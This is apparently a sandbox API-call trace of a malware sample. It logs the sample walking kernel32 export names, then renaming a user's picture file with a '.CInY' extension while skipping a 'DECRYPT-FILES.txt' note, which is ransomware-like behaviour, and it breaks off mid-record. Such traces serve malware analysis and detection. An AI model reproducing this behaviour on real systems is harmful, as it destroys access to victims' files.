lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0086.059] lstrlenA (lpString="CREATEEVENTA") returned 12 [0086.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0086.059] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0086.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0086.059] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0086.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0086.059] lstrlenA (lpString="CREATEEVENTW") returned 12 [0086.059] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0086.059] lstrlenA (lpString="CREATEFIBER") returned 11 [0086.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0086.060] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0086.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0086.060] lstrlenA (lpString="CREATEFILEA") returned 11 [0086.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0086.060] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0086.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0086.060] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0086.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.060] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.060] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.060] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.060] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.060] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.060] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.060] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.060] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.060] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.060] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.060] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.060] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.060] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.060] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.061] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.061] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.061] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.061] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.061] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.061] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.061] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.061] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.061] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.061] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.061] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.061] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.061] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.061] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.061] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.061] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.061] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.061] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.061] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.062] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.062] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.062] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.062] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.062] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.062] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.062] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.062] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.062] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.062] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.062] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.062] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.062] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.062] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.062] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.062] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.062] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.062] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.062] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.063] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.063] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.063] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.063] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.063] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.063] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.063] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.063] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.063] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.063] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.063] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.063] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.063] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.063] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.063] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.063] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.063] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.063] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.063] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.064] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.064] lstrlenA (lpString="DELETEATOM") returned 10 [0086.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.064] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.064] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.064] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.064] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.064] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.064] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.064] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.064] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.064] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.064] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.064] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.064] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.064] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.064] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.064] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.064] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.064] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.065] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.065] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.065] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.065] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.065] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.065] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.065] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.065] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.065] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.065] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.065] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.065] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.065] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.065] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.065] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.065] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.065] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.065] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.065] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.066] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.066] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.066] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.066] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.066] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.066] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.066] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.066] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.066] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.066] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.066] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.066] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.066] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.066] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BeweMui.bmp") returned 50 [0086.066] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BeweMui.bmp.CInY") returned 55 [0086.066] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BeweMui.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bewemui.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\BeweMui.bmp.CInY" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\bewemui.bmp.ciny"), dwFlags=0x0) returned 1 [0086.067] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.067] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.067] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.067] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae5f45e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xae5f45e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xae5f45e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0086.067] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0086.068] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, 